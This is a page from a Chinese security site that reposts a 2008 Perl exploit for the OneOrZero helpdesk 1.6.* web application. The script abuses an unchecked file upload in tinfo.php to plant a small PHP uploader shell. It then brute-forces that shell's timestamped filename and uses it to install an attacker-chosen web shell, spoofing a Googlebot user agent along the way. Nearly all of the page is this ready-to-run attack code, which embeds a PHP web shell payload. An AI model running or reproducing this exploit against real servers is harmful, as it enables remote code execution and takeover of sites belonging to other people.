首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit
来源:ax330d [doggy] gmail [dot] com 作者:Ams 发布时间:2008-12-22  
#!/usr/bin/perl
=about

OneOrZero 1.6.* Perl exploit

AUTHOR
discovered & written by Ams
ax330d [doggy] gmail [dot] com

VULN. DESCRIPTION:
In 'tinfo.php' script there are function
named uploadAttachment() through which
we are able to upload files.
It does not checks what the file
is uploaded.

EXPLOIT WORK:
First of all it uploads small shell,
then, due to unknown shell name,
it bruteforces it.
(Uploaded shell name is concatenation
of original filename,
unix timestamp and substracted
microseconds from time.)
Then it uploads new shell through
small shell.
(Script saves to DB what has been uploaded,
but if magic_quotes_gpc=off exploit
will disable this logging via SQl-inj.)

REQUIREMENTS:
Upload must be allowed.

PS:
With register_globals=on there are even more
vulnerabilities, starting from LFI till
remote code execution.

=cut

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common;

$| = 1;
&banner;

my $expl_url = shift or &usage;
my $tshell2  = shift;
&usage unless -f $tshell2;

my $tshell = q(<?php move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name'])?print('ok1'):0;?>);
my $spider = LWP::UserAgent->new;

$spider->timeout(9);
$spider->max_redirect(0);
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');

exploit($expl_url);

sub exploit {
   
    $_ = shift;
   
my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
    print "\n\tExploiting: $prot://$host$path\n";

    my $req
        = POST "$prot://$host$path/tinfo.php?id=999999",
        Content_Type => 'form-data',
        Content      => [send_mail    => 1,
SelectedFile => [ undef, 'by441e.php', 'Content_Type' => '\' text', 'Content' => $tshell ]
];

my $start_time = time();

    my $res = $spider->request($req);
    if (!$res->is_success) {
        print "\tFailure...\n" . $res->status_line . "\n";
        return 0;
    }
   
if ($res->content !~ /by441e\.php/) {
print "\tFailure...\n";
return 0;
} else {
print "\n\tTest shell uploaded";
}

    my $finish_time = time();
   
    print "\n\tStarting bruteforce (start:${start_time}000 finish:${start_time}999)\n";
   
    for my $sec ($start_time .. $finish_time) {
        for my $micro ('000' .. '999') {

            print "\t$prot://$host$path/attachments/$sec${micro}_by441e.php\r";
            $res = $spider->request(HEAD "$prot://$host$path/attachments/$sec${micro}_by441e.php");

            if ($res->status_line =~ /200/) {
                print "\n\tFound one of shells...";
if (reload("$prot://$host$path/attachments/$sec${micro}_by441e.php")) {
print "\tShell: $prot://$host$path/attachments/sha.php\n";
}
                return;
            }
        }
    }

    print "\n\tCould not find shell...\n";
}

sub reload {

my $addr = shift;
    my $req
        = POST $addr,
        Content_Type => 'form-data',
        Content      => [ f => [ $tshell2, 'sha.php']];
my $res = $spider->request($req);

if ($res->content =~ /ok1/) {
print "new shell uploaded!\n";
return 1;
} else {
print "could not upload new shell.\n";
return 0;
}
}

sub usage {
   
print "
Provide url and shell what to upload.
Usage:
perl $0 http://example.com localshell.php

";
exit;
}

sub banner {
   
    print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  OneOrZero 1.6.* exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ReVou Twitter Clone Admin Pass
·MyPBS (index.php seasonID) Rem
·Linksys Wireless ADSL Router (
·Avahi < 0.6.24 (mDNS Daemon) R
·CoolPlayer 2.19 (Skin File) Lo
·RSS Simple News (news.php pid)
·2532Gigs 1.2.2 Stable Remote C
·Pligg 9.9.5b (check_url.php ur
·YourPlace <= 1.0.2 Multiple Re
·CoolPlayer 2.19 (Skin File) Lo
·Microsoft Outlook Express DoS
·SolarCMS 0.53.8 (Forum) Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved